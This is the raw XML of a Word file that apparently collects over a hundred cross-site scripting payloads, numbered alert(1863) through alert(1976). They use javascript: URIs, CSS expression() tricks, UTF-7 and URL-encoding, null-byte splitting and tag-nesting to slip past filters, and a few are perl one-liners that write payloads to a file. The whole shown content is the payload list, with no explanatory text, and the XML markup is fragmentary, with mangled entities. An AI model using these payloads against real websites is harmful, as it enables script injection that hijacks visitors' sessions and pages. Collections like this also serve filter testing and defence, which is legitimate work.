    <w:p w14:paraId="48034A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&amp;#039;print \&amp;quot;&amp;lt;IMG SRC=java\0script:alert(1863)&amp;gt;\&amp;quot;;&amp;#039; &amp;gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153CFD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&amp;#039;print \&amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(1864)&amp;lt;/SCR\0IPT&amp;gt;\&amp;quot;;&amp;#039; &amp;gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47596FE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&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1865))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D25DF7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&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1866))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB5C3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 STYLE=xss:expression(alert(1867))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E28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"&gt;&lt;script&gt;alert(1868)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683504B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&lt;/XSS/*-*/STYLE=xss:e/**/xpression(alert(1869))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5502426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XSS/*-*/STYLE=xss:e/**/xpression(alert(1870))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB7C6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 STYLE=xss:e/**/xpression(alert(1871))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F90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&lt;/XSS STYLE=xss:expression(alert(1872))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6BAAC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';;alert(1873))//\';;alert(1873))//";;alert(1873))//\";;alert(1873))//--&gt;;&lt;;/SCRIPT&gt;;";&gt;;';&gt;;&lt;;SCRIPT&gt;;alert(1873))&lt;;/SCRIPT&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56835B4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&lt;;SCRIPT&gt;;alert(1874)&lt;;/SCRIPT&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085080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&lt;;SCRIPT&gt;;alert(1875))&lt;;/SCRIPT&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1365C2F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&lt;;BASE HREF=";javascript:alert(1876);//";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6690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&lt;;BGSOUND SRC=";javascript:alert(1877);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252935A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&lt;;BODY BACKGROUND=";javascript:alert(1878);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FCDD6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&lt;;BODY ONLOAD=alert(1879)&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7858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&lt;;DIV STYLE=";background-image: url(javascript:alert(1880))";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5B3BB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&lt;;DIV STYLE=";background-image: url(&amp;;#1;javascript:alert(1881))";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F2FA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&lt;;DIV STYLE=";width: expression(alert(1882));";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4E9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&lt;;FRAMESET&gt;;&lt;;FRAME SRC=";javascript:alert(1883);";&gt;;&lt;;/FRAMESET&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995EBC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&lt;;IFRAME SRC=";javascript:alert(1884);";&gt;;&lt;;/IFRAME&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6783513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&lt;;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(1885);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CE90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SRC=";javascript:alert(1886);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167B245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SRC=javascript:alert(1887)&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2DF0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DYNSRC=";javascript:alert(1888);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367DAD7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LOWSRC=";javascript:alert(1889);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74990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&lt;;STYLE&gt;;li {list-style-image: url(";javascript:alert(1890)";);}&lt;;/STYLE&gt;;&lt;;UL&gt;;&lt;;LI&gt;;XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E8EF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%BCscript%BEalert(1891)%BC/script%BE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7160284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&lt;;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(1892);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6C1C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&lt;;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(1893);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574C4E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&lt;;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;;&lt;;param name=url value=javascript:alert(1894)&gt;;&lt;;/OBJECT&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB3F64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a=";get";;&amp;;#10;b=";URL(";";;&amp;;#10;c=";javascript:";;&amp;;#10;d=";alert(1895);";)";;&amp;#10;eval(a+b+c+d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FB68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&lt;;STYLE TYPE=";text/javascript";&gt;;alert(1896);&lt;;/STYLE&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC2DE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STYLE=";xss:expr/*XSS*/ession(alert(1897))";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA14C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&lt;;XSS STYLE=";xss:expression(alert(1898))";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC7EB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&lt;;STYLE&gt;;.XSS{background-image:url(";javascript:alert(1899)";);}&lt;;/STYLE&gt;;&lt;;A CLASS=XSS&gt;;&lt;;/A&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C643E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&lt;;STYLE type=";text/css";&gt;;BODY{background:url(";javascript:alert(1900)";)}&lt;;/STYLE&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28578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&lt;;LINK REL=";stylesheet"; HREF=";javascript:alert(1901);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB1AE2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&lt;;TABLE BACKGROUND=";javascript:alert(1902)";&gt;;&lt;;/TABLE&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4771FFA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&lt;;TABLE&gt;;&lt;;TD BACKGROUND=";javascript:alert(1903)";&gt;;&lt;;/TD&gt;;&lt;;/TABLE&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B69979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&lt;;XML ID=I&gt;;&lt;;X&gt;;&lt;;C&gt;;&lt;;![CDATA[&lt;;IMG SRC=";javas]]&gt;;&lt;;![CDATA[cript:alert(1904);";&gt;;]]&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE9413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&lt;;XML ID=";xss";&gt;;&lt;;I&gt;;&lt;;B&gt;;&lt;;IMG SRC=";javas&lt;;!-- --&gt;;cript:alert(1905)";&gt;;&lt;;/B&gt;;&lt;;/I&gt;;&lt;;/XML&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78A2C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 xml:space="preserve">&lt;;META HTTP-EQUIV=";Set-Cookie"; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Content=";USERID=&lt;;SCRIPT&gt;;alert(1906)&lt;;/SCRIPT&gt;;";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0A133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&lt;;BR SIZE=";&amp;;{alert(1907)}";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039044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SRC=JaVaScRiPt:alert(1908)&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A0D7B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SRC=javascript:alert(1909)&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F581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SRC=`javascript:alert(1910)`&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4162A24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SRC=javascript:alert(1911))&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF83B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&lt;;HEAD&gt;;&lt;;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";&gt;; &lt;;/HEAD&gt;;+ADw-SCRIPT+AD4-alert(1912);+ADw-/SCRIPT+AD4-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710824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\";;alert(1913);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60699A6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&lt;;/TITLE&gt;;&lt;;SCRIPT&gt;;alert(1914);&lt;;/SCRIPT&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55153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&lt;;STYLE&gt;;@im\port';\ja\vasc\ript:alert(1915)';;&lt;;/STYLE&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311AE65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SRC=";jav&amp;#x09;ascript:alert(1916);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7003AD3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SRC=";jav&amp;;#x09;ascript:alert(1917);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819CCE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SRC=";jav&amp;;#x0A;ascript:alert(1918);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D5DE2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SRC=";jav&amp;;#x0D;ascript:alert(1919);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B784A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';print ";&lt;;IM SRC=java\0script:alert(1920)&gt;";;';&gt;; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3668236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';print ";&amp;;&lt;;SCR\0IPT&gt;;alert(1921)&lt;;/SCR\0IPT&gt;;";;'; &gt;; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542202A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 &amp;;#14;  javascript:alert(1922);";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CB8B6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&lt;;BODY onload!#$%&amp;;()*~+-_.,:;?@[/|\]^`=alert(1923)&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B052C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SRC=";javascript:alert(1924)";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05654E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&lt;;&lt;;SCRIPT&gt;;alert(1925);//&lt;;&lt;;/SCRIPT&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A82528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&lt;;IMG ";";";&gt;;&lt;;SCRIPT&gt;;alert(1926)&lt;;/SCRIPT&gt;;";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A4FBC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";&gt;;&lt;;BODY onload!#$%&amp;;()*~+-_.,:;?@[/|\]^`=alert(1927)&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185CE3D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&lt;;/script&gt;;&lt;;script&gt;;alert(1928)&lt;;/script&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E10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&lt;;scrscriptipt&gt;;alert(1930)&lt;;/scrscriptipt&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DD144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&lt;;br size=\";&amp;;{alert(1931)}\";&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5FEFA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&amp;#039;print \";&lt;;IMG SRC=java\0script:alert(1932)&gt;;\";;&amp;#039; &gt;; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177926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perl -e &amp;#039;print \";&lt;;SCR\0IPT&gt;;alert(1933)&lt;;/SCR\0IPT&gt;;\";;&amp;#039; &gt;; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB827F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&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1934))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE0F04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&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1935))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E1E85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&lt;~/XSS STYLE=xss:expression(alert(1936))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795A88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"&gt;&lt;script&gt;alert(1937)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F6FE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&lt;/XSS/*-*/STYLE=xss:e/**/xpression(alert(1938))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7524CC7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XSS/*-*/STYLE=xss:e/**/xpression(alert(1939))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC563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XSS STYLE=xss:e/**/xpression(alert(1940))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727A7CC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&lt;/XSS STYLE=xss:expression(alert(1941))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6010D5E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&gt;"&gt;&lt;script&gt;alert(1942)&lt;/script&gt;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EBA87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"&gt;&lt;STYLE&gt;@import"javascript:alert(1943)";&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA75A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&gt;"'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(1944)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570901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&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(1945)%22&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A55851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'%uff1cscript%uff1ealert(1946)%uff1c/script%uff1e'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDEE9E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SRC="javascript:alert(1947);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBFAE4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SRC=javascript:alert(1948)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038F0EC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lastRenderedPageBreak/>
        <w:t>&lt;IMG SRC=JaVaScRiPt:alert(1949)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2236A85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SRC=JaVaScRiPt:alert(1950)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E59083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SRC="jav&amp;#x0A;ascript:alert(1951);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E5C92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SRC="jav&amp;#x0D;ascript:alert(1952);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7463D082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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert(1953);&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3443138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&lt;script&gt;alert(1954)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50BE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%3cscript%3ealert(1955)%3c/script%3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B2484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%22%3e%3cscript%3ealert(1956)%3c/script%3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228CA48A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SRC="javascript:alert(1957);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891118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SRC=javascript:alert(1958)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B631B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SRC=javascript:alert(1959)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5D99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src=xss onerror=alert(1960)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA8C34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"""&gt;&lt;SCRIPT&gt;alert(1961)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5863B1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SRC=javascript:alert(1962))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F56287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 ascript:alert(1963);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1BE19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SRC="jav&amp;#x09;ascript:alert(1964);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71766B8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BACKGROUND="javascript:alert(1965)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707AE1F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&lt;BODY ONLOAD=alert(1966)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFCF2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&lt;INPUT TYPE="IMAGE" SRC="javascript:alert(1967);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABCB1C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&lt;IMG SRC="javascript:alert(1968)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9BE23D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&lt;&lt;SCRIPT&gt;alert(1969);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73431BBE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%253cscript%253ealert(1970)%253c/script%253e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C4334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"&gt;&lt;s"%2b"cript&gt;alert(1971)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB1368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foo&lt;script&gt;alert(1972)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E245DD0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&lt;scr&lt;script&gt;ipt&gt;alert(1973)&lt;/scr&lt;/script&gt;ipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FD706" w14:textId="77777777" w:rsidR="002407AE" w:rsidRDefault="002407AE" w:rsidP="002407AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>';alert(1974))//\';alert(1974))//";alert(1974))//\";alert(1974))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(1974))&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A58A85E" w14:textId="77777777" w:rsidR="002407AE" w:rsidRDefault="002407AE" w:rsidP="002407AE">
      <w:r>
        <w:t>&lt;marquee onstart='javascript:alert(1975);'&gt;=(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>◕</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>◕</w:t>
      </w:r>
      <w:r>
        <w:t>)=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1193E319" w14:textId="763FF7E9" w:rsidR="00F96926" w:rsidRDefault="002407AE" w:rsidP="002407AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/span&gt;&lt;/span&gt;&lt;svg onload="alert(1976)//“ #"=""&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F969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22"/>
    <w:rsid w:val="002407AE"/>
    <w:rsid w:val="0027565F"/>
    <w:rsid w:val="003773C1"/>
    <w:rsid w:val="00395169"/>
    <w:rsid w:val="004D6117"/>
    <w:rsid w:val="00672623"/>
    <w:rsid w:val="006918E0"/>
    <w:rsid w:val="00757206"/>
    <w:rsid w:val="007B3A22"/>
    <w:rsid w:val="00801398"/>
    <w:rsid w:val="00977AB1"/>
    <w:rsid w:val="00A77B3F"/>
    <w:rsid w:val="00AA0ABE"/>
    <w:rsid w:val="00AB612E"/>
    <w:rsid w:val="00AC57BC"/>
    <w:rsid w:val="00C55244"/>
    <w:rsid w:val="00CB7F07"/>
    <w:rsid w:val="00CC5C6B"/>
    <w:rsid w:val="00D1274C"/>
    <w:rsid w:val="00D60BB0"/>
    <w:rsid w:val="00D60C19"/>
    <w:rsid w:val="00DB3CBF"/>
    <w:rsid w:val="00F9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19D85-4F3A-4F0C-A7E4-EDC59558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A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A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A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A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A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3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A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A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17007</Words>
  <Characters>96945</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>807</Lines>
  <Paragraphs>227</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>113725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 少</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>世 少</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-02T02:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-02T02:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>